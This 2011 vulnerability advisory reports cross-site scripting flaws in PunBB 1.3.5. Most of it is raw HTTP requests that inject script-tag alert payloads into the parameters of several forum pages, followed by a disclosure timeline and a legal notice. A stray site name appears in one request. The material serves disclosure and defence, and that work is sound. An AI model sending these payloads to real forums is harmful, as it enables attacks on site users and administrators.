Affected Software : PunBB PHP Forum

Severity          : Medium

Local/Remote      : Remote

Author            : @drk1wi

 

[Summary]

 

Just for those whom it might concern.

These vulnerabilities have been identified for the latest (clean

version 1.3.5) during one of my penetration tests.

 

[Vulnerability Details]

 

 

GET

/login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>

GET

/misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>

 

POST /delete.php?id=>"'><script>alert(oink)</script>

form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</script>

 

POST /edit.php?id=>"'><script>alert(oink)</script>

form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>

 

POST /login.php?action=>"'><script>alert(oink)</script>

form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oink)</script>

 

POST /misc.php?email=>"'><script>alert(oink)</script>

form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>

 

POST www.2cto.com

/profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>

form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><script>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script>

 

POST /register.php?action=>"'><script>alert(oink)</script>

form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>&register=>"'><script>alert(oink)</script>

 

 

[Time-line]

 

20/08/2011- Vendor notified

02/09/2011- No e-mail reply and BAN on Forum

???        - Vendor patch release

16/09/2011- Public disclosure

 

[Fix Information]

 

 

Cheers,

Piotr Duszynski (@drk1wi)

http://sharpsec.net

 

X. LEGAL NOTICES

 

Copyright (c) 2011 Piotr "drk1wi" Duszynski

 

Permission is granted for the redistribution of this alert

electronically. It may not be edited in any way without mine express

written consent. If you wish to reprint the whole or any

part of this alert in any other medium other than electronically,

please email me for permission.

 

Disclaimer: The information in the advisory is believed to be accurate

at the time of publishing based on currently available information. Use

of the information constitutes acceptance for use in an AS IS

condition.

There are no warranties with regard to this information. Neither the

author nor the publisher accepts any liability for any direct,

indirect,

or consequential loss or damage arising from use of, or reliance on,

this information.